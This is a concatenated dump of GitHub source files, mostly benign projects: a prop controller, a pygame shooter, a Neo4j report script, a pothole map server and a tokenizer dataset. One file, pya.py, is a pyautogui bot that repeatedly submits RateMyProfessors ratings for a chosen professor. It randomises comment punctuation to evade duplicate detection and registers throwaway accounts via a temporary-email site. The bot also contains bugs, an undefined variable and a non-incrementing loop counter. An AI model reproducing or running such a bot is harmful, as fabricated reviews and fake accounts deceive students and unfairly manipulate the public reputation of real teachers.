once\n\n\t# iterate through triggers and build action arrays\n\tfor trigger in triggers:\n\t\t#print('Getting actions for trigger ' + trigger['type'], trigger)\n\t\ttrigger['actions'] = get_actions(str(trigger['opid']), trigger['type'], trigger['params'][0])\n\t\ttrigger.pop('opid') # remove 'opid' key so it doesn't take more chars in output\n\n\tprint (json.dumps(triggers, indent=2))\n\n\tdata = json.dumps(triggers, separators=(',', ':'))\n\t#data = json.dumps(triggers, separators=(',', ':')).replace('\"', '')\n\tprint ('String length: {0}'.format(len(data)))\n\t# TODO Get rid of all opid keys to save space\n\t# TODO Remove all \"\" from string to see if it still parses\n\t#print('Sending Trigger:', data)\n\temit('send_graph', {'data': data})\n\n\n# returns actions[] - an array of objects like:\n# [ {hexid: ,\n# type: ,\n# params: [, <>], <-- if output, [0] is state, [1] is port\n# actions: []\n# } ]\ndef get_actions(str_opid, from_type, trigger_state):\n\tparams = json.load(open('data/params.json'))\n\tdata = json.load(open('data/graph.json'))\n\toperators = data['operators']\n\tlinks = data['links']\n\n\tactions = []\n\tfor linkid, v in links.items():\n\t\tif str_opid == str(v['fromOperator']): # matched this operator to from trigger/action\n\t\t\t#print(from_type, v['fromConnector'], on_state)\n\t\t\t# if this was called from a trigger, only proceed if from connector matches\n\t\t\tif from_type == \"Input\" and v['fromConnector'] != trigger_state:\n\t\t\t\tbreak\n\t\t\tto_opid = v['toOperator'] # operator id to which this link connects\n\t\t\thexid = params[str(to_opid)]['hexid'] # get hex id of controller\n\t\t\ttype = operators[str(to_opid)]['properties']['class']\n\t\t\taction_params = []\n\t\t\tif type.endswith('timer'):\n\t\t\t\ttype = 'Timer'\n\t\t\t\taction_params = [str(params[str(to_opid)]['param1'])]\n\t\t\telif type.endswith('output'):\n\t\t\t\ttype = 'Output'\n\t\t\t\taction_params = [v['toConnector'], params[str(to_opid)]['param2']]\n\t\t\telif type.endswith('sound'):\n\t\t\t\taction_params = []\n\t\t\t\ttype = 'Sound'\n\t\t\taction = {'hexid': hexid, 'type': type, 'params': action_params}\n\t\t\taction['actions'] = get_actions(str(to_opid), 'Action', v['fromConnector'])\n\t\t\t# add a timer action if this is an input and needs a delay before\n\t\t\t#print(type,params[str(to_opid)]['param3'])\n\t\t\tif type == 'Output' and float(params[str(to_opid)]['param3']) > 0:\n\t\t\t\tt_action = {\n\t\t\t\t\t'hexid': '',\n\t\t\t\t\t'type': 'Timer',\n\t\t\t\t\t'params': [params[str(to_opid)]['param3']],\n\t\t\t\t\t'actions': [action]\n\t\t\t\t}\n\t\t\t\tactions.append(t_action)\n\t\t\telse:\n\t\t\t\tactions.append(action)\n\n\t#print('Found actions:', actions)\n\treturn actions\n\n\ndef get_next_opid():\n\ti = 0\n\tops = json.load(open('data/graph.json')).get('operators', None)\n\tif ops is None:\n\t\treturn i\n\twhile ops.get(str(i), None) is not None:\n\t\ti = i + 1\n\treturn i\n\n\ndef get_next_hexid(hexid_list):\n\ti = 1\n\thexid = format(i, '02x') # 2-digit hex string\n\n\twhile hexid in sorted(hexid_list):\n\t\tprint('Checking hexid ' + hexid)\n\t\ti = i + 1\n\t\thexid = format(i, '02x')\n\n\treturn hexid\n\n\nif __name__ == '__main__':\n\tsocketio.run(app, debug=True)\n","repo_name":"barskey/new-prop-controller","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14776291650","text":"import pygame\nimport time\nimport sys\nimport random\nimport os\nfrom setting import Settings\nfrom bee import Bee\nfrom hero import Hero\nfrom enemy import Enemy\nfrom award import Award\nfrom airplane import Airplane\n\nSTART = 0\nRUNNING = 1\nPAUSE = 2\nGAMEOVER = 3\nstate = START\nsets = Settings()\nscreen = pygame.display.set_mode(\n (sets.bgImageWidth, sets.bgImageHeight), 0, 32) # 创建窗口\nhero = Hero(screen, sets.heroImages)\nflyings = []\nbullets = []\nscore = 0\nglobal FIRE_HERO\nFIRE_HERO = 400\nfclock = pygame.time.Clock()\nfps = 144 # 帧数\npygame.mixer.init()\nmusicList = [\n pygame.mixer.Sound('music/bullet1.ogg')\n]\n\nhistory = 0\n\n\n# 历史最高分\nclass History:\n # 读取历史最高分函数\n def ReadHistory(path='score.txt'):\n global history\n if os.path.exists(path):\n with open(path, 'r') as f_r:\n history = f_r.read()\n else:\n with open(path, 'w') as f_w:\n f_w.write('0')\n\n # 更新历史最高分函数\n def UpdateHistory(score, path='score.txt'):\n if os.path.exists(path):\n with open(path, 'r') as file_r:\n if int(file_r.read()) < score:\n with open(path, 'w') as file_w:\n file_w.write(str(score))\n\n\ndef hero_blitme():\n \"\"\"画英雄机\"\"\"\n global hero\n hero.blitme()\n\n\ndef bullets_blitme():\n \"\"\"画子弹\"\"\"\n for b in bullets:\n b.blitme()\n\n\ndef flyings_blitme():\n \"\"\"画飞行物\"\"\"\n global sets\n for fly in flyings:\n fly.blitme()\n\n\ndef score_blitme():\n \"\"\"画分数和生命值\"\"\"\n pygame.font.init()\n fontObj = pygame.font.Font(\"SIMYOU.TTF\", 20) # 创建font对象\n\n textSurfaceObj_life = fontObj.render(u'生命值:%d\\n' % hero.getLife(), False,\n (135, 100, 184))\n textSurfaceObj_grade = fontObj.render(u'分数:%d\\n' % score, False,\n (135, 100, 184))\n textRectObj_life = textSurfaceObj_life.get_rect()\n textRectObj_life.center = (60, 10)\n screen.blit(textSurfaceObj_life, textRectObj_life)\n\n textRectObj_grade = textSurfaceObj_grade.get_rect()\n textRectObj_grade.center = (410, 10)\n screen.blit(textSurfaceObj_grade, textRectObj_grade)\n\n\ndef state_blitme():\n \"\"\"画状态\"\"\"\n global sets\n global state\n if state == START:\n screen.blit(sets.start, (0, 0))\n global score\n score = 0\n elif state == PAUSE:\n screen.blit(sets.pause, (0, 0))\n elif state == GAMEOVER:\n History.ReadHistory()\n screen.blit(sets.gameover, (0, 0))\n fontObj_over = pygame.font.Font(\"SIMYOU.TTF\", 50) # 创建font对象\n\n textSurfaceObj_over = fontObj_over.render(u'最高分数:%d\\n' % int(history), False,\n (51, 204, 250, 255))\n textRectObj_over = textSurfaceObj_over.get_rect()\n textRectObj_over.center = (400, 400)\n screen.blit(textSurfaceObj_over, textRectObj_over)\n\n fontObj_over2 = pygame.font.Font(\"SIMYOU.TTF\", 50) # 创建font对象\n\n textSurfaceObj_over2 = fontObj_over2.render(u'当前分数:%d\\n' % score, False,\n (51, 204, 250, 255))\n textRectObj_over2 = textSurfaceObj_over2.get_rect()\n textRectObj_over2.center = (400, 600)\n screen.blit(textSurfaceObj_over2, textRectObj_over2)\n\n\ndef blitmes():\n \"\"\"画图\"\"\"\n hero_blitme()\n flyings_blitme()\n bullets_blitme()\n score_blitme()\n state_blitme()\n\n\ndef nextOne_air():\n \"\"\"生成敌人\"\"\"\n type = random.randint(0, 100)\n if type < 50 and score < 3000:\n return Airplane(screen, sets.airImage[0], 1)\n elif type < 30 and type > 10:\n return Airplane(screen, sets.airImage[1], 2)\n elif type < 40 and type > 10:\n return Airplane(screen, sets.airImage[2], 3)\n elif type < 10 and score > 20000:\n return Airplane(screen, sets.airImage[3], 4)\n\n\ndef nextOne_goods():\n \"\"\"生成奖励\"\"\"\n type = random.randint(0, 100)\n if type < 2:\n return Bee(screen, sets.beeImage[0], 1)\n elif type >= 2 and type < 5:\n return Bee(screen, sets.beeImage[1], 2)\n elif type >= 5 and type < 6:\n return Bee(screen, sets.beeImage[2], 0)\n\n\nflyEnteredIndex = 0\n\n\ndef enterAction():\n \"\"\"生成敌人\"\"\"\n\n global flyEnteredIndex\n flyEnteredIndex += 1\n if flyEnteredIndex % 20 == 0:\n flyingobj = nextOne_air()\n flyings.append(flyingobj)\n if flyEnteredIndex % 40 == 0:\n flyingobj = nextOne_goods()\n flyings.append(flyingobj)\n\n\nshootIndex = 0\n\n\ndef shootAction():\n \"\"\"子弹入场,将子弹加到bullets\"\"\"\n global shootIndex\n shootIndex += 5\n # print(hero.shoot_speed())\n speed = hero.shoot_speed(hero.getFire_MOD())\n if shootIndex % speed == 0:\n if shootIndex > 100000:\n shootIndex = 0\n if hero.getFire_MOD() == 1:\n heroBullet = hero.shoot(sets.heroBullet[0])\n musicList[0].play()\n if hero.getFire_MOD() == 2:\n heroBullet = hero.shoot(sets.heroBullet[1])\n musicList[0].play()\n for bb in heroBullet:\n bullets.append(bb)\n\n\ndef stepAction_flyings():\n \"\"\"飞行物走一步\"\"\"\n hero.step()\n for flyobj in flyings:\n if isinstance(flyobj, Airplane):\n flyobj.step()\n if isinstance(flyobj, Bee):\n flyobj.step()\n\n\ndef stepAction_bullets():\n \"\"\"子弹走一步\"\"\"\n global bullets\n for b in bullets:\n b.step()\n\n\ndef outOfBoundAction():\n \"\"\"删除越界的敌人和飞行物\"\"\"\n global flyings\n flyingLives = []\n index = 0\n for f in flyings:\n if isinstance(f, Airplane):\n if f.outOfBounds() == True:\n flyingLives.insert(index, f)\n index += 1\n if isinstance(f, Bee):\n if f.outOfBounds() == True:\n flyingLives.insert(index, f)\n index += 1\n flyings = flyingLives\n index = 0\n global bullets\n bulletsLive = []\n for b in bullets:\n if b.outOfBounds() == True:\n bulletsLive.insert(index, b)\n index += 1\n bullets = bulletsLive\n\n\nj = 0\n\n\ndef bangAction():\n \"\"\"子弹与敌人碰撞\"\"\"\n\n for b in bullets:\n bang(b)\n\n\ndef bang(b):\n \"\"\"子弹与敌人碰撞检测\"\"\"\n\n for x in range(0, len(flyings)):\n one = flyings[x]\n if isinstance(one, Enemy):\n if flyings[x].shootBy(b):\n f = flyings[x]\n if b in bullets:\n bullets.remove(b)\n if isinstance(f, Airplane):\n\n print(f.get_air_life())\n f.set_air_life(FIRE_HERO)\n\n if (f.get_air_life() <= 0):\n one = flyings[x]\n if isinstance(one, Enemy):\n f = flyings[x]\n if isinstance(f, Airplane):\n if f.get_air_life() <= 0:\n global score\n score += one.getScore() # 获得分数\n flyings.remove(one) # 删除\n break\n\n\n# def bang(b):\n# \"\"\"子弹与敌人碰撞检测\"\"\"\n# index = -1\n# for x in range(0, len(flyings)):\n# one = flyings[x]\n# if isinstance(one, Enemy):\n# f = flyings[x]\n# if f.shootBy(b):\n# index = x\n# break\n# if index != -1:\n# one = flyings[index]\n# if isinstance(one, Enemy):\n# global score\n# score += one.getScore() # 获得分数\n# flyings.remove(one) # 删除\n# bullets.remove(b)\n\n\ndef checkGameOverAction():\n if isGameOver():\n global state\n global score\n History.UpdateHistory(score)\n state = GAMEOVER\n hero.reLife()\n pygame.font.init()\n\n\ndef isGameOver():\n for f in flyings:\n # 与奖励碰撞\n\n if hero.hit(f) and isinstance(f, Award):\n type = f.getType()\n # print(type)\n # 获得不同类型的子弹和生命\n if type == Award.FIRE_RED:\n hero.setFire_MOD(1)\n # print(\"red\")\n if type == Award.FIRE_PURPLE:\n hero.setFire_MOD(2)\n # print(\"purple\")\n if type == Award.LIFE:\n hero.addLife()\n flyings.remove(f)\n # 与敌机碰撞\n if hero.hit(f) and isinstance(f, Enemy):\n hero.sublife()\n hero.clearFire()\n flyings.remove(f)\n\n return hero.getLife() <= 0\n\n\ndef action():\n x, y = pygame.mouse.get_pos()\n\n blitmes() # 打印飞行物\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n flag = pygame.mouse.get_pressed()[0] # 左键单击事件\n midflag = pygame.mouse.get_pressed()[1]\n rflag = pygame.mouse.get_pressed()[2] # 右键单击事件\n global state\n if midflag == True:\n\n for fly in flyings:\n if isinstance(fly,Airplane):\n global score\n score += fly.getScore() # 获得分数\n flyings.remove(fly) # 删除\n for fly in flyings:\n if isinstance(fly,Airplane):\n score += fly.getScore() # 获得分数\n flyings.remove(fly) # 删除\n if flag == True and (state == START or state == PAUSE):\n state = RUNNING\n if flag == True and state == GAMEOVER:\n state = START\n if rflag == True:\n state = PAUSE\n\n if state == RUNNING:\n hero.move(x, y)\n enterAction()\n shootAction()\n outOfBoundAction()\n stepAction_bullets()\n stepAction_flyings()\n bangAction()\n checkGameOverAction()\n\n\ndef main():\n # 1. 创建窗口\n\n pygame.display.set_caption(\"飞机大战\")\n while True:\n screen.blit(sets.bgImage, (0, 0)) # 加载屏幕\n action()\n pygame.display.update() # 重新绘制屏幕\n fclock.tick(fps)\n\n\nif __name__ == '__main__':\n pygame.mixer.music.load(\"music/Back.ogg\")\n pygame.mixer.music.play(-1)\n main()\n","repo_name":"misaka46/Aircraft-war","sub_path":"plane_1.0/plane/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25847457488","text":"# Code for generating an SoA from a DDF graph database\n# Code has been quickly put together to get the desired outputs rather than\n# making the code as elegant. It might be possible to merge the queries or \n# have them return more easily consumed results\n\nfrom neo4j import GraphDatabase\nfrom beautifultable import BeautifulTable\n\ndriver = GraphDatabase.driver(\"neo4j://localhost:7687\", auth=(\"neo4j\", \"ddf\"))\n\nwith driver.session() as session:\n\n # Choose a protocol from DB\n protocol_name = \"DDR\"\n\n # Data\n visits = {}\n visit_row = {}\n visit_rule = {}\n epoch_visits = {}\n epoch_count = 0\n\n # Epochs and Visits\n query = \"\"\"MATCH (pr:STUDY_PROTOCOL)<-[]-(s:STUDY)-[]->(sd:STUDY_DESIGN)-[]->(sc:STUDY_CELL)-[]->\n (e:STUDY_EPOCH)-[]->(v:VISIT) WHERE pr.brief_title = '%s'\n WITH e.study_epoch_name as epoch,v.name as visit ORDER BY e.sequence_in_study, v.number\n RETURN DISTINCT epoch, visit\"\"\" % (protocol_name)\n result = session.run(query)\n for record in result:\n if not record[\"epoch\"] in epoch_visits:\n epoch_visits[record[\"epoch\"]] = [] \n epoch_count += 1\n epoch_visits[record[\"epoch\"]].append(record[\"visit\"])\n visits[record[\"visit\"]] = record[\"epoch\"]\n visit_row[record[\"visit\"]] = \"\"\n\n # Visit Rules\n query = \"\"\"MATCH (pr:STUDY_PROTOCOL)<-[]-(s:STUDY)-[]->(sd:STUDY_DESIGN)-[]->(sc:STUDY_CELL)-[]->(e:STUDY_EPOCH)\n -[]->(v:VISIT) WHERE pr.brief_title = '%s'\n WITH v ORDER BY v.number\n MATCH (v)-[:HAS_START_RULE]->(sr:RULE)\n MATCH (v)-[:HAS_END_RULE]->(er:RULE)\n RETURN v.name as visit,sr.rule_desc as start_rule,er.rule_desc as end_rule\"\"\" % (protocol_name)\n result = session.run(query)\n for visit in visits.keys():\n visit_rule[visit] = \"\"\n for record in result:\n if record[\"start_rule\"] == record[\"end_rule\"]:\n visit_rule[record[\"visit\"]] = \"%s\" % (record[\"start_rule\"])\n else:\n visit_rule[record[\"visit\"]] = \"%s to %s\" % (record[\"start_rule\"], record[\"end_rule\"])\n\n # Activities\n query = \"\"\"MATCH (pr:STUDY_PROTOCOL)<-[]-(s:STUDY)-[]->(sd:STUDY_DESIGN)-[]->(sc:STUDY_CELL)-[]->(e:STUDY_EPOCH)\n -[]->(v:VISIT)<-[]-(wfi:WORKFLOW_ITEM)-[]->(a:ACTIVITY) WHERE pr.brief_title = '%s'\n WITH a.description as activity, v.name as visit ORDER BY v.number\n RETURN DISTINCT activity, visit\"\"\" % (protocol_name)\n result = session.run(query)\n activities = {}\n for record in result:\n if not record[\"activity\"] in activities:\n activities[record[\"activity\"]] = visit_row.copy()\n activities[record[\"activity\"]][record[\"visit\"]] = \"X\" \n\n # Activity Order\n activity_order = []\n query = \"\"\"MATCH path=(a:ACTIVITY)-[r:HAS_PREVIOUS_ACTIVITY]->(b:ACTIVITY) RETURN b.description as desc ORDER BY LENGTH(path) ASC;\"\"\"\n result = session.run(query)\n for record in result:\n activity_order.append(record[\"desc\"])\n #print(activity_order)\n #print(activities.keys())\n\ndriver.close()\n\n# Display the SoA\ntable = BeautifulTable()\ntable.columns.header = [\"\"] + list(visits.values())\ntable.rows.append([\"\"] + list(visits.keys()))\ntable.rows.append([\"\"] + list(visit_rule.values()))\nfor activity in activity_order:\n if activity in activities:\n data = activities[activity]\n table.rows.append([activity] + list(data.values()))\ntable.maxwidth = 210\nprint(\"\")\nprint(\"\")\nprint(\"Schedule of Assessmments for %s\" % (protocol_name))\nprint(\"\")\nprint(table)\n\n# Extra, informational output, list of Visits, Activities, the Study Data nodes and eCRF links\nquery = \"\"\"MATCH (pr:STUDY_PROTOCOL)<-[]-(s:STUDY)-[]->(sd:STUDY_DESIGN)-[]->(sc:STUDY_CELL)-[]->(e:STUDY_EPOCH)\n -[]->(v:VISIT)<-[]-(wfi:WORKFLOW_ITEM)-[]->(a:ACTIVITY)-[]->(sda:STUDY_DATA) WHERE pr.brief_title = '%s'\n WITH a.description as activity, v.name as visit, sda.description as study_data, sda.ecrf_link as ecrf_link ORDER BY v.number\n RETURN DISTINCT activity, visit, study_data, ecrf_link\"\"\" % (protocol_name)\nresult = session.run(query)\ntable = BeautifulTable()\ntable.columns.header = [\"Visit\", \"Activity\", \"Study Data\", \"eCRF Link\"]\nfor record in result:\n table.rows.append([record[\"visit\"], record[\"activity\"], record[\"study_data\"], record[\"ecrf_link\"]])\ntable.maxwidth = 210\nprint(\"\")\nprint(\"\")\nprint(\"Activities and eCRF Links %s\" % (protocol_name))\nprint(\"\")\nprint(table)\n \n","repo_name":"data4knowledge/ddf","sub_path":"soa.py","file_name":"soa.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26357718213","text":"\r\nimport webbrowser\r\nimport pyautogui as py\r\nimport time\r\nimport random\r\nimport pyperclip\r\nuser = input(\"Enter the porf ID: \").strip()\r\nwebbrowser.open('https://www.ratemyprofessors.com/ShowRatings.jsp?tid='+user) #(the id for the prof) \r\ntime.sleep(4)\r\npy.click(949,696)\r\n\r\ndef ratemyprofessors():\r\n\r\n\r\n\r\n\trev0 = [\"!!\", \"!\", \".\", \".....!\", '!!!!!!!','_','?',',',\"!!!!!\", \"...!\"] #to be added randomly to the comment sectino wiht the list below to pass the repatitve comment \r\n\r\n\trev = [\"good prof\", \"great\", \"...\", \"and so on\"] #comments to be added\r\n\ttime.sleep(2)\r\n\r\n\r\n\ttime.sleep(3)\r\n\r\n\tpy.click(949,696)\r\n\r\n\t\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(314, 775)\r\n\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(552, 821)\r\n\r\n\t\r\n\r\n\tpy.typewrite(courses[random.randint(0,len(courses)-1)]) # Typing a random course name from the list\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(798, 830)\r\n\r\n\tfor i in range(5):\r\n\t\tpy.click(1907, 1020) # Scrolling down \r\n\r\n\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(525, 403)\r\n\r\n\tpy.click(855, 504)\r\n\r\n\tpy.click(885, 597)\r\n\r\n\tpy.click(748, 693)\r\n\r\n\tpy.click(725, 796)\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tfor i in range(10):\r\n\t\tpy.click(1907, 1020) #scrlling\r\n\r\n\r\n\r\n\ttime.sleep(random.randint(1,4))\r\n\tpy.click(421, 441)\r\n\r\n\tnewrev = rev[random.randint(0,len(rev)-1)] + (rev0[random.randint(0,len(rev0)-1)])\r\n\r\n\tpy.typewrite(newrev)\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\r\n\r\n\tfor i in range(5):\r\n\t\tpy.click(1907, 1020)\r\n\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(596, 469)\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(383, 612)\r\n\ttime.sleep(1)\r\n\tpy.click(520, 709)\r\n\r\n\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(244,621)\r\n\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.click(330,426)\r\n\ttime.sleep(random.randint(1,4))\r\n\r\n\tpy.write(\"..Prof name ...\", interval=0.5) # typing the prof name \r\n\r\n\ttime.sleep(2)\r\n\r\n\tpy.click(293, 483)\r\n\r\n\ttime.sleep(10)\r\n\r\n\r\n\r\ndef newMail():\r\n\ttime.sleep(2)\r\n\twebbrowser.open('https://www.mohmal.com/en') # temp email website to make a quick random email after a few ratings\r\n\ttime.sleep(1)\r\n\tpy.click(900,516) # click on a random eamil button\r\n\ttime.sleep(1)\r\n\tpy.click(941,223) # copy the email\r\n\ttime.sleep(1)\r\n\t\r\n\r\n\tpy.click(193,17) # back to old tab \r\n\r\n\tpy.click(744,683) #email\r\n\r\n\tpy.hotkey('ctrl','a')\r\n\tpy.hotkey('ctrl', 'v')\r\n\r\n\r\n\tpy.click(660,800) #Confemail\r\n\r\n\tpy.hotkey('ctrl', 'v')\r\n\ttime.sleep(1)\r\n\r\n\r\n\tfor i in range(6):\r\n\t\ttime.sleep(0.15)\r\n\t\tpy.click(1907, 1020)\r\n\r\n\tpy.click(550, 196) # pass\r\n\r\n\tpy.typewrite(\"qweQ1995\") # Entring creds\r\n\r\n\ttime.sleep(1)\r\n\r\n\r\n\tpy.click(621,344)\r\n\r\n\tpy.typewrite(\"qweQ1995\")\r\n\r\n\tpy.click(510,448) #fname\r\n\ttime.sleep(1)\r\n\r\n\tpy.typewrite(\"AewfBC\")\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(500,552)\r\n\r\n\ttime.sleep(1)\r\n\r\n\tpy.typewrite(\"CBadfA\")\r\n\r\n\r\n\tfor i in range(5):\r\n\r\n\t\tpy.click(1907, 1020)\r\n\r\n\ttime.sleep(1)\r\n\r\n\r\n\r\n\tpy.click(548,217) #agree\r\n\ttime.sleep(1)\r\n\r\n\r\n\tpy.click(484,332) # agree\r\n\ttime.sleep(1)\r\n\r\n\r\n\tpy.click(710, 605) # singuup\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(526,19) #back to email\r\n\ttime.sleep(1)\r\n\tpy.click(949,431) #Refresh the page\r\n\ttime.sleep(5)\r\n\tpy.click(564,544) #conf email\r\n\ttime.sleep(3)\r\n\r\n\r\n\tpy.click(729,833) #clicking on the link\r\n\ttime.sleep(1)\r\n\tpy.click(932,19) #exit the tap\r\n\r\n\r\n\tpy.click(635,19)\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(255,605) #login email\r\n\ttime.sleep(2)\r\n\tpy.hotkey('ctrl', 'v')\r\n\r\n\ttime.sleep(1)\r\n\tpy.click(360,700) #pwd\r\n\tpy.typewrite(\"qweQ1995\")\r\n\r\n\ttime.sleep(2)\r\n\r\n\r\n\tpy.click(303,781) #login\r\n\ttime.sleep(1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef signOutAndUp():\r\n\r\n\tpy.click(1673,129) # profile\r\n\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(1573,366) # logout\r\n\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(1889,366)\r\n\r\n\ttime.sleep(1)\r\n\r\n\tpy.click(1830,118) # profile\r\n\ttime.sleep(2)\r\n\r\n\r\ncount = 0\r\nwhile count < 100:\r\n\tratemyprofessors()\r\n\tprint(count)\r\n\tcount=+1\r\n\r\n\r\n","repo_name":"HamzaNasser/AutoRater-for-RateMyProf","sub_path":"pya.py","file_name":"pya.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29994132747","text":"\nimport re\nanimals = [\"muggercrocodile\", \"one-hornedrhino\", \"python\", \"moth\", \"monitorlizard\", \"bengaltiger\"]\ndef fauna_number(txt):\n res = []\n for x, word in enumerate(re.split(\",| \", txt)):\n for animal in animals:\n if word == animal:\n res.append((animal, re.split(\",| \", txt)[x-1]))\n return res\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"jecvfH5eyGLrSwzNh_12.py","file_name":"jecvfH5eyGLrSwzNh_12.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4888217668","text":"from flask import Flask, request, redirect, url_for, render_template, make_response\nimport keys\nimport sqlite3\n\ndb = sqlite3.connect('potholes.db')\napp = Flask(__name__)\n\ndef get_potholes():\n global db\n\n if db is None:\n print(\"Database is none!\")\n return []\n\n c = db.cursor()\n c.execute(\"SELECT * FROM holes\")\n \n return c.fetchall()\n\n@app.route(\"/\")\ndef index():\n potholes = get_potholes()\n api_key = keys.map_key\n json='{\"type\":\"FeatureCollection\",\"features\":[' \\\n + ','.join([ \\\n '{\"type\":\"Feature\",\"properties\":{' \\\n + '\"count\": %d' % count \\\n + '}, \"geometry\":{\"type\":\"Point\",' \\\n + '\"coordinates\":[%f,%f]}' % (lon, lat) \\\n + '}' for (_, lat, lon, count) in potholes]) \\\n + ']}'\n return render_template('index.html', api_key=api_key, json=json)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=80)\n","repo_name":"aowsenek/HackCU4","sub_path":"server/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39522134268","text":"import os\n\ndef find_file(filename):\n for file in os.listdir():\n if file == filename:\n return True\n return False\n\nos.chdir('Activity/RPA/.txts')\nresult = False\n\nwhile result == False:\n current_file = input(\"Source File: \")\n result = find_file(f\"{current_file}.txt\")\n\nnew_file = input(\"New File: \")\nopen(f\"{new_file}.txt\", \"x\")\n\nmessage = open(f\"{current_file}.txt\", \"r\")\nmessage = message.read()\n\nreplaced_word = input(\"Replaced Word: \").lower()\nnew_word = input(\"New Word: \").lower()\n\nmessage = message.replace(replaced_word, new_word)\n\nnew_file = open(f\"{new_file}.txt\", \"w\")\nnew_file.write(message)\n\nnew_file.close()\n\n","repo_name":"pedro-rampazo/programming_study","sub_path":"PYTHON/Activity/RPA/replace_words.py","file_name":"replace_words.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21261548268","text":"from federatedml.nn.dataset.base import Dataset\nimport pandas as pd\nimport torch as t\nfrom transformers import AutoTokenizer\nimport os\nimport numpy as np\n\n# avoid tokenizer parallelism\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\n\nclass TokenizerDataset(Dataset):\n \"\"\"\n A Dataset for some basic NLP Tasks, this dataset will automatically transform raw text into word indices\n using AutoTokenizer from transformers library,\n\n Parameters\n ----------\n truncation bool, truncate word sequence to 'text_max_length'\n text_max_length int, max length of word sequences\n tokenizer_name_or_path str, name of bert tokenizer(see transformers official for details) or path to local\n transformer tokenizer folder\n return_label bool, return label or not, this option is for host dataset, when running hetero-NN\n padding bool, whether to pad the word sequence to 'text_max_length'\n padding_side str, 'left' or 'right', where to pad the word sequence\n pad_token str, pad token, use this str as pad token, if None, use tokenizer.pad_token\n return_input_ids bool, whether to return input_ids or not, if False, return word_idx['input_ids']\n \"\"\"\n\n def __init__(\n self,\n truncation=True,\n text_max_length=128,\n tokenizer_name_or_path=\"bert-base-uncased\",\n return_label=True,\n padding=True,\n padding_side=\"right\",\n pad_token=None,\n return_input_ids=True):\n\n super(TokenizerDataset, self).__init__()\n self.text = None\n self.word_idx = None\n self.label = None\n self.tokenizer = None\n self.sample_ids = None\n self.padding = padding\n self.truncation = truncation\n self.max_length = text_max_length\n self.with_label = return_label\n self.tokenizer_name_or_path = tokenizer_name_or_path\n self.tokenizer = AutoTokenizer.from_pretrained(\n self.tokenizer_name_or_path)\n self.tokenizer.padding_side = padding_side\n self.return_input_ids = return_input_ids\n if pad_token is not None:\n self.tokenizer.add_special_tokens({'pad_token': pad_token})\n\n def load(self, file_path):\n\n tokenizer = self.tokenizer\n self.text = pd.read_csv(file_path)\n text_list = list(self.text.text)\n\n self.word_idx = tokenizer(\n text_list,\n padding=self.padding,\n return_tensors='pt',\n truncation=self.truncation,\n max_length=self.max_length)\n\n if self.return_input_ids:\n self.word_idx = self.word_idx['input_ids']\n\n if self.with_label:\n self.label = t.Tensor(self.text.label).detach().numpy()\n self.label = self.label.reshape((len(self.text), -1))\n\n if 'id' in self.text:\n self.sample_ids = self.text['id'].values.tolist()\n\n def get_classes(self):\n return np.unique(self.label).tolist()\n\n def get_vocab_size(self):\n return self.tokenizer.vocab_size\n\n def get_sample_ids(self):\n return self.sample_ids\n\n def __getitem__(self, item):\n\n if self.return_input_ids:\n ret = self.word_idx[item]\n else:\n ret = {k: v[item] for k, v in self.word_idx.items()}\n\n if self.with_label:\n return ret, self.label[item]\n\n return ret\n\n def __len__(self):\n return len(self.text)\n\n def __repr__(self):\n return self.tokenizer.__repr__()\n","repo_name":"FederatedAI/FATE-LLM","sub_path":"python/fate_llm/dataset/nlp_tokenizer.py","file_name":"nlp_tokenizer.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"32"} +{"seq_id":"27558569091","text":"from os import path\nfrom parser import parse_arguments\nfrom cisei.cisei_scrapper import scrap_cisei\nfrom cognomix.cognomix_scrapper import scrap_cognomix\nfrom currencies_rates.currencies_rates_scrapper import scrap_currencies_rates\nfrom mr_lodge.mr_lodge_scrapper import scrap_mr_lodge\n\n\ndef interface():\n args = parse_arguments()\n data = None\n\n if args.mr_lodge:\n data = scrap_mr_lodge()\n\n if args.currencies_rates:\n data = scrap_currencies_rates()\n\n if args.cisei:\n scrap_cisei()\n\n if args.cognomix:\n data = scrap_cognomix()\n\n if args.output_folder and data is not None:\n 